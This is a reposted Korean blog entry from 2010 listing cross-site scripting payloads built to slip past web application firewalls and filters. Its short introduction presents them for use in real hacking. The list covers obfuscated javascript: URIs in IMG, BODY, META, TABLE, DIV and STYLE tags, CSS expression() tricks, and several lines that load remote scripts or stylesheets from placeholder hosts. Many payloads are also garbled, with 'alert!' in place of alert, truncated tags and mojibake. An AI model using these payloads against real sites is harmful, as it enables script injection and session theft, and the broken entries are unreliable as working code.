Computer(IT)/Hacking & Virus

xss Sample Code (가져옴)

약탄치킨 2010. 6. 25. 16:07
반응형

 대부분의 웹어플리케이션 보안시스템(웹방화벽 등)에서는 시그니쳐 등에 의해서 기본적으로 필터링이 되는것이  테니 실제로 해킹에 적용할때는 다양한 변형방법을 통한

코드  이뤄집니다.

대표적으로 다양한 TAG나 자바스크립트등을 이용하는데, 이 방법 역시  코드 변환 기법이 있어 막는자 입장에서는 쉽지 않은 게임이라고 봅니다.

 

 

 

===================================샘플 코드 시작=======================================

[1] XSS Javascript Injection

      <SCRIPT

 

[2] Image XSS의 다양한 Type

     <IMG SRC="#">

      <IMG SRC=javascript:alert!('XSS')>

     <IMG SRC=JaVaScRiPt:alert!('XSS')>

      <IMG SRC=javascript:alert!("XSS")>

      <IMG SRC=`javascript:alert!("RSnake says, 'XSS'")`>

     <IMG """><SCRIPT>alert!("XSS")</SCRIPT>">

      <IMG SRC=javascript:alert!(String.fromCharCode(88,83,83))>

     <IMG SRC=javascript:alert('XSS')>

      <IMG SRC=javascript:alert('XSS')>

     <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

      <IMG SRC="jav

      <IMG SRC="jav ascript:alert!('XSS');">

     <IMG SRC="jav ascript:alert!('XSS');">

      <IMG SRC="jav ascript:alert!('XSS');">

      <IMG SRC="   javascript:alert!('XSS');">

     <IMG SRC="#"

      <IMG DYNSRC="javascript:alert!('XSS')">

      <IMG LOWSRC="javascript:alert!('XSS')">

       SRC='vbscript!:msgbox("XSS")'>

 

[3] Non-alpha-non-digit XSS

     <SCRIPT/XSS SRC="http://xxxx/xss.js"></SCRIPT>

 

[4] Title Tag XSS

     </TITLE><SCRIPT>alert!("XSS");</SCRIPT>

 

[5] Input Tag XSS

      <INPUT TYPE="IMAGE" SRC="#">

 

[6]  Tag XSS

      <BODY BACKGROUND="javascript:alert!('XSS')">

      <BODY >

 

[7] Meta Tag XSS

       HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert!('XSS');">

      <META HTTP-EQUIV="refresh" CONTENT="0;  :alert!('XSS');">

 

[8] Frame Tag XSS

     <IFRAME SRC="#"></IFRAME>

      <iframe src=http://xxxx/scriptlet.html <

      <FRAMESET><FRAME SRC="#"></FRAMESET>

 

[9] Table  XSS

      <TABLE BACKGROUND="javascript:alert!('XSS')">

     <TABLE><TD BACKGROUND="javascript:alert!('XSS')">

 

[10] DIV Tag

      <DIV STYLE="background-image: url(javascript:alert!('XSS'))">

     <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

      <DIV STYLE="background-image:  :alert!('XSS'))">

      <DIV STYLE="width: expression!(alert!('XSS'));">

 

[11] Style Tag XSS

      <STYLE>@import!'http://xxx/xss.css';</STYLE>

     <XSS STYLE="behavior: url(xss.htc);">

      <STYLE>li  url("javascript:alert!('XSS')");}</STYLE><UL><LI>XSS

      <STYLE>@im\port'\ja\vasc\ript:alert!("XSS")';</STYLE>

     <IMG STYLE="xss:expr/*XSS*/ession(alert!('XSS'))">

      <XSS STYLE="xss:expression!(alert!('XSS'))">

     <STYLE>.XSS{background-image:url("javascript:alert!('XSS')");}</STYLE><A CLASS=XSS></A>

       type="text/css">BODY{background:url("javascript:alert!('XSS')")}</STYLE>

 

[12] Various Tag XSS

     <LINK REL="stylesheet" HREF="javascript:alert!('XSS');">

       REL="stylesheet" HREF=http://xxx/xss.css>

      <!--[if gte IE 4]><SCRIPT>alert!('XSS');</SCRIPT><![endif]-->

      <BASE HREF="javascript:alert!('XSS');//">

       SRC=http://xxxx/xss.swf AllowScriptAccess="always"></EMBED>

 

[13] Other Types

     <<SCRIPT>alert!("XSS");//<</SCRIPT>

      <SCRIPT>a=/XSS/alert!(a.source)</SCRIPT>

     \";alert!('XSS');//

      ¼script¾alert!(¢XSS¢)¼/script¾


출처 : http://inxight.textcube.com/40

반응형
저작자표시 비영리

'Computer(IT)/Hacking & Virus'의 다른글

  • 현재글xss Sample Code (가져옴)

관련글

티스토리툴바